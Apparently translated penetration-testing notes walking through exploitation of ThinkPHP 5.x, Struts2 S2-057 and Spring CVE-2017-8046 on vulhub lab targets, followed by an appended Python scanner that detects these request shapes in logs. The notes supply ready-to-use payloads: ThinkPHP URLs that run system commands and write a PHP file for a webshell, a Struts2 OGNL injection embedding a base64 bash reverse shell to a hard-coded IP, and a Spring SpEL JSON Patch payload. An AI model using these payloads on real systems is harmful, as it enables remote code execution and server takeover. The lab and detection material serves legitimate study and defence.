I. ThinkPHP (TP)
ThinkPHP 5.x remote command execution and getshell
1. Environment setup
Target range: vulhub/thinkphp/5-rce
docker-compose up -d # start the environment
2. Steps
1. Command execution. Append the following directly after the URL:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
and the whoami command is executed.
2. Remote code execution. Append the following after the URL:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
and the code is executed remotely.
3. To get a shell, just append the following after the URL:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php
This generates a file named 1.php in the directory; visiting 1.php executes the code. For a remote connection, simply replace phpinfo() with a one-line webshell.
Struts2
1. Environment setup
vulhub target range
cd /vul-hub/struts2/s2-057
docker-compose up -d # start the target range
2. Steps
1. First visit the target machine: http://<target IP>/struts2-showcase/

2. Then enter: bash -i >& /dev/tcp/47.105.65.103/6666 0>&1 and base64-encode it.
4. Paste the base64-encoded reverse-shell command into the following code, then URL-encode the code.
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,<paste the base64-encoded reverse-shell command here>}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
5. Then start a listener on another machine.
6. Then append the following to the URL and send the request:
/struts2-showcase/%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC80Ny4xMDUuNjUuMTAzLzY2NjYgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
7. Back on the listening machine, the shell has been received successfully.
Spring
1. Environment setup
vulhub target range /spring/CVE-2017-8046
2. Steps
1. Visit: http://47.105.65.103:8080/customers/1
2. Refresh the page, capture the request with Burp Suite, and modify the captured packet as shown in the picture.
Request data:
[{
  "op": "replace",
  "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname",
  "value": "vulhub"
}]
3. Then go into the target container and look in the tmp directory: a file named success will have appeared (the byte array in the path decodes to the command touch /tmp/success).
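As an added defensive example that is not part of the original notes, the following Python scans web-server access-log lines and a request body for the three request shapes walked through above: the ThinkPHP invokefunction query string, the Struts2 OGNL expression in the URL path, and the Spring Data REST JSON Patch path carrying a SpEL type reference. The sample log lines, client IPs and PATCH body are constructed here for illustration; the rule names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page), shaped like the requests described above.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200',
    '10.0.0.6 - - "GET /struts2-showcase/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%7D/actionChain1.action HTTP/1.1" 200',
    '10.0.0.7 - - "GET /index.php?s=index/user/login HTTP/1.1" 200',
]

# Constructed PATCH body modelled on the JSON Patch request in the Spring section (command removed).
SAMPLE_PATCH_BODY = '[{"op":"replace","path":"T(java.lang.Runtime).getRuntime()/lastname","value":"x"}]'

# Detection rules keyed to the request shapes shown on this page (assumed names, not a vendor ruleset).
RULES = {
    "thinkphp5_invokefunction": re.compile(r"think\\app/invokefunction", re.I),
    "thinkphp5_call_user_func_array": re.compile(r"[?&]function=call_user_func_array", re.I),
    "struts2_ognl_member_access": re.compile(r"\$\{.*@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS", re.I | re.S),
    "spring_spel_type_reference": re.compile(r"\bT\(java\.lang\.", re.I),
}

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def normalize(text):
    # Decode twice so single- or double-URL-encoded payloads are inspected in plain form.
    return unquote(unquote(text))

def scan_request(target, body=""):
    """Return the sorted rule names that fire on one request target and optional body."""
    haystack = normalize(target) + "\n" + normalize(body)
    return sorted(name for name, rx in RULES.items() if rx.search(haystack))

def scan_log(lines):
    """Return (client_ip, matched_rules) for every access-log line that trips a rule."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        matched = scan_request(m.group("target"))
        if matched:
            hits.append((line.split()[0], matched))
    return hits

if __name__ == "__main__":
    for ip, rules in scan_log(SAMPLE_LOGS):
        print(ip, rules)
    print(scan_request("/customers/1", SAMPLE_PATCH_BODY))
```

Request bodies are not in a standard access log, so the PATCH check is shown against a body captured separately (for example from a WAF or reverse-proxy body log).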